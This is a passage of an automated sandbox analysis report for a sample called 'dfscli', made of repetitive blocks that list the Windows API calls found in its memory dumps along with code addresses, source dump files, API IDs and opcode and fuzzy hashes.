• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: GlobalLocklstrlen
• String ID:
• API String ID: 1144527523-0
APIs
• SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042426A
• SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004242CF
• SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00424314
• SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042433D
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• lstrcpynA.KERNEL32(?,?,00000104), ref: 00424E11
• GetFileTime.KERNEL32(?,?,?,?), ref: 00424E33
• GetFileSize.KERNEL32(?,00000000), ref: 00424E41
• GetFileAttributesA.KERNEL32(?), ref: 00424E6B
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: File$AttributesSizeTimelstrcpyn
• String ID:
• API String ID: 1499663573-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: FreeString$ClearVariant
• String ID:
• API String ID: 3349467263-0
APIs
  • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
  • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
  • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
• CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041AF54
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
• String ID:
• API String ID: 1997773198-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: _strlen$___initmbctable_strcat
• String ID:
• API String ID: 109824703-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: CreateH_prologIndirectRect
• String ID:
• API String ID: 2123978231-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                  • String ID:
                                                                  • API String ID: 3253174383-0
                                                                  • Opcode ID: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction ID: a1dea07ca2ec4367596b7633afa73df90ca84adeb2077ed1b3f452afad63676a
                                                                  • Opcode Fuzzy Hash: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction Fuzzy Hash: 05115E30600305DBDB259F65D848B6677B8AF00741F1D0A3AE8C5AA2E0DB3ADD21CA5E
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EqualH_prologIntersect
                                                                  • String ID:
                                                                  • API String ID: 2227276553-0
                                                                  • Opcode ID: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction ID: 913515354d6a92e134cf8808074a3165ff7f6a37c3e08295266c1903fc249c36
                                                                  • Opcode Fuzzy Hash: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction Fuzzy Hash: 2C212C72A00219EFDB11EF95D984DDEBBB8FF08354B10456AF951A3250D7389E058B64
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004202B2
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004202BA
                                                                  • LockResource.KERNEL32(00000000), ref: 004202CC
                                                                  • FreeResource.KERNEL32(00000000), ref: 00420316
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction ID: 656d2c210f5b5afbe86cf1a99f8a29c5f19edac70fe617a666d0c49f05aa73d5
                                                                  • Opcode Fuzzy Hash: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction Fuzzy Hash: 67119D3A601721EFCB24DFA5E948AA7B7B8FB04754F80446AE80253752E778AC05CB74
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231AB
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231CD
                                                                  • GetCapture.USER32 ref: 004231DF
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004231EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  • Opcode ID: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction ID: f54eaa0953af14796ca2798ad8be5b391c5598d7a46c12b9b30925c7b8ab6a99
                                                                  • Opcode Fuzzy Hash: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction Fuzzy Hash: 1E016D713403197FFA302B15ACC9FBB76ADDF88789F910439F241AB2D2CA959C059A64
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004249F9
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 004249FF
                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00424A02
                                                                  • GetLastError.KERNEL32(?), ref: 00424A1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 3907606552-0
                                                                  • Opcode ID: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction ID: 8ac3f6cd50cf8df22ad13eb24bf5b481f7bec5be52e842199ecbcbeb8f3ca53e
                                                                  • Opcode Fuzzy Hash: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction Fuzzy Hash: 1C012471700210BBDB20AFB6EC49F1B7BADEF84360F608026F915CB281DA74DC018764
                                                                  APIs
                                                                  • htonl.WS2_32(00000000), ref: 0042C075
                                                                  • htons.WS2_32(?), ref: 0042C081
                                                                    • Part of subcall function 0040422C: bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  • inet_addr.WS2_32(?), ref: 0042C0B3
                                                                  • WSASetLastError.WS2_32(00002726), ref: 0042C0C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastbindhtonlhtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3045141626-0
                                                                  • Opcode ID: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction ID: bb8df0c29fff26a21c7ebcb5d6223e386f4c65aafe457ce3011b1e801e2c3432
                                                                  • Opcode Fuzzy Hash: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction Fuzzy Hash: D2018831A00118ABCB10EBE5E84599FBBB8AF44354F500526F505E7291DB785A45C7DA
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 00422626
                                                                  • GetTopWindow.USER32(00000000), ref: 00422665
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00422683
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  • Opcode ID: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction ID: cb0a53dda468c9b6b58841506fecf0a12188666d2209ed4bb47fc30449578cc2
                                                                  • Opcode Fuzzy Hash: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction Fuzzy Hash: FA01043320152ABBCF125F91AE05E9F3B26AF54361F854116FE0061160D77AD932EBAE
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00422077
                                                                  • GetTopWindow.USER32(00000000), ref: 0042208A
                                                                    • Part of subcall function 0042206C: GetWindow.USER32(00000000,00000002), ref: 004220D1
                                                                  • GetTopWindow.USER32(?), ref: 004220BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  • Opcode ID: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction ID: 611b05ef37a8cdda27b70757f5ae3b19c9143c7451e53f26c9eb106d08c62b60
                                                                  • Opcode Fuzzy Hash: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction Fuzzy Hash: 26018432301539B7DB322F52AE04FAF36559F157A0F804026FF00A1220D7B9D951D69D
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042760A
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427613
                                                                  • wsprintfA.USER32 ref: 0042762F
                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00427645
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1902064621-0
                                                                  • Opcode ID: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction ID: 249eee3b46158d6d5fcb97f90f683b9770f48eaba065b46f6e1ac24a512eab86
                                                                  • Opcode Fuzzy Hash: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction Fuzzy Hash: 5B015E32600629FBCB21AFA5DD05E9F3BA9BF08714F404436FA01A6150DB75DA129B98
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32(?), ref: 0042A079
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A08F
                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042A097
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A0AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                  • String ID:
                                                                  • API String ID: 3384502665-0
                                                                  • Opcode ID: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction ID: dc896c3cb116076c9357b3b04fc63cbba15b70dbedf9f50e9427452b928ef166
                                                                  • Opcode Fuzzy Hash: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction Fuzzy Hash: F1F05471207234BF93205B67DC48CEBBF9CEE8B2A4B014526F545C2110C6355801CBF6
                                                                  APIs
                                                                  • IntersectRect.USER32(?,00000000,?), ref: 00409539
                                                                  • EqualRect.USER32(?,00000000), ref: 00409546
                                                                  • IsRectEmpty.USER32(?), ref: 00409550
                                                                  • InvalidateRect.USER32(?,?,?), ref: 0040956D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                  • String ID:
                                                                  • API String ID: 3354205298-0
                                                                  • Opcode ID: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction ID: 5a9675a2ec0c149863344b7b821c378a1e07663030a84a8ac4983ad52a3ab610
                                                                  • Opcode Fuzzy Hash: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction Fuzzy Hash: 60014C3290011AEBDF11DFA5DC48EAAB7BCFF09314F408462F914A7111D230A6068B64
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004239FD
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28), ref: 00423A09
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A16
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A31
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,?,?), ref: 0041FC98
                                                                  • GetFocus.USER32 ref: 0041FCAB
                                                                  • GetParent.USER32(?), ref: 0041FCB9
                                                                  • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0041FCCE
                                                                  Similarity
                                                                  • API ID: EnableFocusItemMenuMessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 2297321873-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3022380644-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ___addl
                                                                  • String ID:
                                                                  • API String ID: 2260456530-0
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 004265D2
                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004265EE
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 00426602
                                                                  • SetWindowTextA.USER32(?,?), ref: 00426612
                                                                  Similarity
                                                                  • API ID: TextWindow$lstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 330964273-0
                                                                  APIs
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Similarity
                                                                  • API ID: Window$Active$EnableFreeResource
                                                                  • String ID:
                                                                  • API String ID: 3751187028-0
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0042A404
                                                                  • GetTickCount.KERNEL32 ref: 0042A411
                                                                  • CoFreeUnusedLibraries.OLE32 ref: 0042A420
                                                                  • GetTickCount.KERNEL32 ref: 0042A426
                                                                    • Part of subcall function 0042A38B: CoFreeUnusedLibraries.OLE32(00000000,0042A46B,00000000,?,?,00409F1F), ref: 0042A3CF
                                                                    • Part of subcall function 0042A38B: OleUninitialize.OLE32(?,?,00409F1F), ref: 0042A3D5
                                                                  Similarity
                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                  • String ID:
                                                                  • API String ID: 685759847-0
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0040FCD9
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: @D$@D
                                                                  • API String ID: 1807457897-1398737213
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: __shift_strcat_strlen
                                                                  • String ID: e+000
                                                                  • API String ID: 208078240-1027065040
                                                                  APIs
